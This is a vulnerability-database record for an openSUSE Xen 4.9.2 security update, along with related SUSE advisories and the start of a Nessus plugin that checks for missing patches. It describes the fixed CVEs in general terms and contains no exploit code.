{"id": "OPENSUSE-SU-2018:1274-1", "bulletinFamily": "unix", "title": "Security update for xen (important)", "description": "This update for xen to version 4.9.2 fixes several issues.\n\n This feature was added:\n\n - Added script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU. They are triggered via 'xl vcpu-set\n domU N'\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7540: x86 PV guest OS users were able to cause a denial of\n service (host OS CPU hang) via non-preemptable L3/L4 pagetable freeing\n (bsc#1080635).\n - CVE-2018-7541: Guest OS users were able to cause a denial of service\n (hypervisor crash) or gain privileges by triggering a grant-table\n transition from v2 to v1 (bsc#1080662).\n - CVE-2018-7542: x86 PVH guest OS users were able to cause a denial of\n service (NULL pointer dereference and hypervisor crash) by leveraging\n the mishandling\n of configurations that lack a Local APIC (bsc#1080634).\n\n These non-security issues were fixed:\n\n - bsc#1087252: Update built-in defaults for xenstored in stubdom, keep\n default to run xenstored as daemon in dom0\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow processing\n vmcores with crash(1)\n - bsc#1072834: Prevent unchecked MSR access error\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n", "published": "2018-05-12T00:37:01", "modified": "2018-05-12T00:37:01", "cvss": {"score": 6.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}, "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00059.html", "reporter": "Suse", "references": ["https://bugzilla.suse.com/1080635", "https://bugzilla.suse.com/1090823", "https://bugzilla.suse.com/1089152", "https://bugzilla.suse.com/1072834", "https://bugzilla.suse.com/1087251", "https://bugzilla.suse.com/1089635", "https://bugzilla.suse.com/1027519", "https://bugzilla.suse.com/1080662", "https://bugzilla.suse.com/1087252", "https://bugzilla.suse.com/1090820", "https://bugzilla.suse.com/1080634", "https://bugzilla.suse.com/1090822"], "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "type": "suse", "lastseen": "2018-05-12T02:43:24", "edition": 1, "viewCount": 122, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-05-12T02:43:24", "rev": 2}, "dependencies": {"references": [{"type": "suse", "idList": ["SUSE-SU-2018:1216-1", "SUSE-SU-2018:1177-1", "SUSE-SU-2018:1181-1", "SUSE-SU-2018:1202-1", "SUSE-SU-2018:1184-1", "SUSE-SU-2018:1203-1", "SUSE-SU-2018:0909-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310874611", "OPENVAS:1361412562310891300", "OPENVAS:1361412562310874540", "OPENVAS:1361412562310874259", "OPENVAS:1361412562310704131", "OPENVAS:1361412562310851742", "OPENVAS:1361412562310891577", "OPENVAS:1361412562310704201", "OPENVAS:1361412562310874755", "OPENVAS:1361412562310874189"]}, {"type": "nessus", "idList": ["SUSE_SU-2018-1216-1.NASL", "SUSE_SU-2018-3230-1.NASL", "SUSE_SU-2018-1203-1.NASL", "DEBIAN_DSA-4131.NASL", "SUSE_SU-2018-1202-1.NASL", "SUSE_SU-2018-1184-1.NASL", "OPENSUSE-2018-454.NASL", "SUSE_SU-2018-1177-1.NASL", "FEDORA_2018-C553A586C8.NASL", "SUSE_SU-2018-1181-1.NASL"]}, {"type": "cve", "idList": ["CVE-2018-7540", "CVE-2017-5754", "CVE-2018-7541", "CVE-2018-8897", "CVE-2018-10471", "CVE-2018-10472", "CVE-2018-7542"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4131-1:D22BC", "DEBIAN:DLA-1577-1:71995", "DEBIAN:DLA-1300-1:11474", "DEBIAN:DSA-4201-1:7E613"]}, {"type": "fedora", "idList": ["FEDORA:520A96076F57", "FEDORA:6A9A16095B29", "FEDORA:977BB60A6180", "FEDORA:3FBD8604970A", "FEDORA:6E66862A5C82", "FEDORA:6CE076015F62", "FEDORA:698AD6087A96"]}, {"type": "f5", "idList": ["F5:K17403481", "F5:K91229003"]}, {"type": "symantec", "idList": ["SMNTC-102378", "SMNTC-104071"]}, {"type": "citrix", "idList": ["CTX232655", "CTX231399", "CTX234679"]}, {"type": "gentoo", "idList": ["GLSA-201810-06"]}, {"type": "virtuozzo", "idList": ["VZA-2018-028", "VZA-2018-029"]}, {"type": "redhat", "idList": ["RHSA-2018:1353", "RHSA-2018:1346", "RHSA-2018:1352"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4097"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:12D0AED8A6507BA497CB8CC165A00D0A"]}, {"type": "zdt", "idList": ["1337DAY-ID-30427"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148549"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20181010-01-DEBUG"]}, {"type": "cert", "idList": ["VU:631579"]}, {"type": "exploitdb", "idList": ["EDB-ID:44697"]}], "modified": "2018-05-12T02:43:24", "rev": 2}, "vulnersScore": 6.4}, "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-libs-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen-libs", "packageVersion": "4.9.2_04-19.2"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-debugsource-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen-debugsource", "packageVersion": "4.9.2_04-19.2"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-tools-domU-debuginfo-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen-tools-domU-debuginfo", "packageVersion": "4.9.2_04-19.2"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-libs-debuginfo-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen-libs-debuginfo", "packageVersion": "4.9.2_04-19.2"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-tools-debuginfo-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen-tools-debuginfo", "packageVersion": "4.9.2_04-19.2"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-doc-html-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen-doc-html", "packageVersion": "4.9.2_04-19.2"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen", "packageVersion": "4.9.2_04-19.2"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-tools-domU-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen-tools-domU", "packageVersion": "4.9.2_04-19.2"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-devel-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen-devel", "packageVersion": "4.9.2_04-19.2"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "arch": "x86_64", "operator": "lt", "packageFilename": "xen-tools-4.9.2_04-19.2.x86_64.rpm", "packageName": "xen-tools", "packageVersion": "4.9.2_04-19.2"}]}

{"suse": [{"lastseen": "2018-05-10T00:04:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "description": "This update for xen to version 4.9.2 fixes several issues.\n\n This feature was added:\n\n - Added script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU. They are triggered via 'xl vcpu-set\n domU N'\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7540: x86 PV guest OS users were able to cause a denial of\n service (host OS CPU hang) via non-preemptable L3/L4 pagetable freeing\n (bsc#1080635).\n - CVE-2018-7541: Guest OS users were able to cause a denial of service\n (hypervisor crash) or gain privileges by triggering a grant-table\n transition from v2 to v1 (bsc#1080662).\n - CVE-2018-7542: x86 PVH guest OS users were able to cause a denial of\n service (NULL pointer dereference and hypervisor crash) by leveraging\n the mishandling\n of configurations that lack a Local APIC (bsc#1080634).\n\n These non-security issues were fixed:\n\n - bsc#1087252: Update built-in defaults for xenstored in stubdom, keep\n default to run xenstored as daemon in dom0\n - bsc#1087251: Preserve xen-syms from xen-dbg.gz to allow processing\n vmcores with crash(1)\n - bsc#1072834: Prevent unchecked MSR access error\n\n", "edition": 1, "modified": "2018-05-09T21:09:32", "published": "2018-05-09T21:09:32", "id": "SUSE-SU-2018:1184-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00013.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 6.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2018-05-11T18:07:08", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n These non-security issues were fixed:\n\n - bsc#1086039: Ensure that Dom0 does represent DomU cpu flags correctly\n - bsc#1027519: Fixed shadow mode guests\n\n", "edition": 1, "modified": "2018-05-11T15:07:06", "published": "2018-05-11T15:07:06", "id": "SUSE-SU-2018:1216-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00018.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-10T20:05:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n", "edition": 1, "modified": "2018-05-10T18:07:13", "published": "2018-05-10T18:07:13", "id": "SUSE-SU-2018:1202-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00014.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-09T20:03:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n This non-security issue was fixed:\n\n - bsc#1072834: Prevent unchecked MSR access error\n - bsc#1057493: Prevent DomU crashes\n - bsc#1086107: Fixed problems with backports for XSA-246 and XSA-247\n\n", "edition": 1, "modified": "2018-05-09T18:08:03", "published": "2018-05-09T18:08:03", "id": "SUSE-SU-2018:1177-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00011.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-09T20:03:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n These non-security issues were fixed:\n\n - bsc#1072834: Prevent unchecked MSR access error\n - bsc#1035442: Increase the value of LIBXL_DESTROY_TIMEOUT from 10 to 100\n seconds, allowing for more domUs to be shutdown in parallel\n - bsc#1057493: Prevent DomU crash\n\n", "edition": 1, "modified": "2018-05-09T18:16:20", "published": "2018-05-09T18:16:20", "id": "SUSE-SU-2018:1181-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00012.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-05-11T00:06:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "description": "This update for xen fixes several issues.\n\n These security issues were fixed:\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions on x86 (XSA-260,\n bsc#1090820)\n - Handle HPET timers in IO-APIC mode correctly to prevent malicious or\n buggy HVM guests from causing a hypervisor crash or potentially\n privilege escalation/information leaks (XSA-261, bsc#1090822)\n - Prevent unbounded loop, induced by qemu allowing an attacker to\n permanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n - CVE-2018-10472: x86 HVM guest OS users (in certain configurations) were\n able to read arbitrary dom0 files via QMP live insertion of a CDROM, in\n conjunction with specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n - CVE-2018-10471: x86 PV guest OS users were able to cause a denial of\n service (out-of-bounds zero write and hypervisor crash) via unexpected\n INT 80 processing, because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n - CVE-2018-7550: The load_multiboot function allowed local guest OS users\n to execute arbitrary code on the host via a mh_load_end_addr value\n greater than mh_bss_end_addr, which triggers an out-of-bounds read or\n write memory access (bsc#1083292).\n\n", "edition": 1, "modified": "2018-05-10T21:07:16", "published": "2018-05-10T21:07:16", "id": "SUSE-SU-2018:1203-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00015.html", "title": "Security update for xen (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-10T21:08:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7540", "CVE-2017-5753", "CVE-2017-5754", "CVE-2017-5715", "CVE-2018-7541"], "description": "This update for xen fixes the following issues:\n\n Update to Xen 4.7.5 bug fix only release (bsc#1027519)\n\n Security issues fixed:\n\n - CVE-2018-7540: Fixed DoS via non-preemptable L3/L4 pagetable freeing\n (XSA-252) (bsc#1080635)\n - CVE-2018-7541: A grant table v2 -&gt; v1 transition may crash Xen (XSA-255)\n (bsc#1080662)\n - CVE-2017-5753,CVE-2017-5715,CVE-2017-5754 Fixed information leaks via\n side effects of speculative execution (XSA-254). Includes Spectre v2\n mitigation. (bsc#1074562)\n\n\n - Preserve xen-syms from xen-dbg.gz to allow processing vmcores with\n crash(1) (bsc#1087251)\n - Xen HVM: Fixed unchecked MSR access error (bsc#1072834)\n - Add script, udev rule and systemd service to watch for vcpu\n online/offline events in a HVM domU They are triggered via xl vcpu-set\n domU N (fate#324965)\n - Make sure tools and tools-domU require libs from the very same build\n\n", "edition": 1, "modified": "2018-04-10T18:07:40", "published": "2018-04-10T18:07:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00009.html", "id": "SUSE-SU-2018:0909-1", "type": "suse", "title": "Security update for xen (important)", "cvss": {"score": 6.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T06:45:09", "description": "This update for xen to version 4.9.2 fixes several issues. This\nfeature was added :\n\n - Added script, udev rule and systemd service to watch for\n vcpu online/offline events in a HVM domU. They are\n triggered via 'xl vcpu-set domU N' These security issues\n were fixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7540: x86 PV guest OS users were able to cause\n a denial of service (host OS CPU hang) via\n non-preemptable L3/L4 pagetable freeing (bsc#1080635).\n\n - CVE-2018-7541: Guest OS users were able to cause a\n denial of service (hypervisor crash) or gain privileges\n by triggering a grant-table transition from v2 to v1\n (bsc#1080662).\n\n - CVE-2018-7542: x86 PVH guest OS users were able to cause\n a denial of service (NULL pointer dereference and\n hypervisor crash) by leveraging the mishandling of\n configurations that lack a Local APIC (bsc#1080634).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 32, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-10T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : xen (SUSE-SU-2018:1184-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-7540", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-7542", "CVE-2018-7541", "CVE-2018-8897"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:xen-tools-debuginfo", "p-cpe:/a:novell:suse_linux:xen-doc-html", "p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo", "p-cpe:/a:novell:suse_linux:xen-debugsource", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs-debuginfo", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-1184-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1184-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109677);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-7540\", \"CVE-2018-7541\", \"CVE-2018-7542\", \"CVE-2018-8897\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : xen (SUSE-SU-2018:1184-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen to version 4.9.2 fixes several issues. This\nfeature was added :\n\n - Added script, udev rule and systemd service to watch for\n vcpu online/offline events in a HVM domU. They are\n triggered via 'xl vcpu-set domU N' These security issues\n were fixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7540: x86 PV guest OS users were able to cause\n a denial of service (host OS CPU hang) via\n non-preemptable L3/L4 pagetable freeing (bsc#1080635).\n\n - CVE-2018-7541: Guest OS users were able to cause a\n denial of service (hypervisor crash) or gain privileges\n by triggering a grant-table transition from v2 to v1\n (bsc#1080662).\n\n - CVE-2018-7542: x86 PVH guest OS users were able to cause\n a denial of service (NULL pointer dereference and\n hypervisor crash) by leveraging the mishandling of\n configurations that lack a Local APIC (bsc#1080634).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1072834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1080634\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1080635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1080662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7540/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7541/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7542/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181184-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b2b70d41\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-828=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-828=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-828=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 